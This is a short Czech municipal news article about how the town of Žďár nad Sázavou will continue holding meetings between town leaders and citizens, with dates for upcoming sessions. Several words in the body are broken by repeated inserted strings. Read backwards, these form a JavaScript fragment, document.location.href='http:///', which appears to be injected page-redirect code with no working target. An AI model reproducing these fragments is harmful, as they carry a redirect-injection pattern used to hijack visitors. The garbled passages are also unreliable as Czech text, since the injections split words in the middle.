setkání
Rainbow page separator

Tradiční žďárská setkání s občany budou pokračovat

Středa, 21. ledna 2015

Městský úřad Žďár nad Sázavou

Žďár nad Sázavou / Dlouhá léta zažitá forma schůzek vedení města s občany v pros[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];torách městského úřadu bude pokračovat, a [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to i přes [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to, že nové vedení Žďáru se chce při diskusích s lidmi o konkrétní věci setkávat na různých místech města. Nově tak bude ve Žďáře fungovat dvojí způsob setkávání se zástupců radnice s obyvateli.
Každou první středu v měsíci bude na předem dohodnutém místě vedení města s veřejností jednat o vybraném tématu, přičemž nejbližší setkání se uskuteční 4. února od 16.30 hodin v Kině Vysočina a bude se týkat jeho rekonstrukce a využití.
Druhou varian[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tou dialogu s veřejností zůstanou tradiční schůzky v městském úřadě, které ale budou oproti předešlým letům méně časté. Uskutečňovat se mají jednou za tři měsíce – další setkání, při kterém mohou zájemci s vedením radnice hovořit o aktuálních tématech týkajících se běžného života ve Žďáře, přijde na řadu 1. dubna od 15 hodin v zasedací místnosti rady města.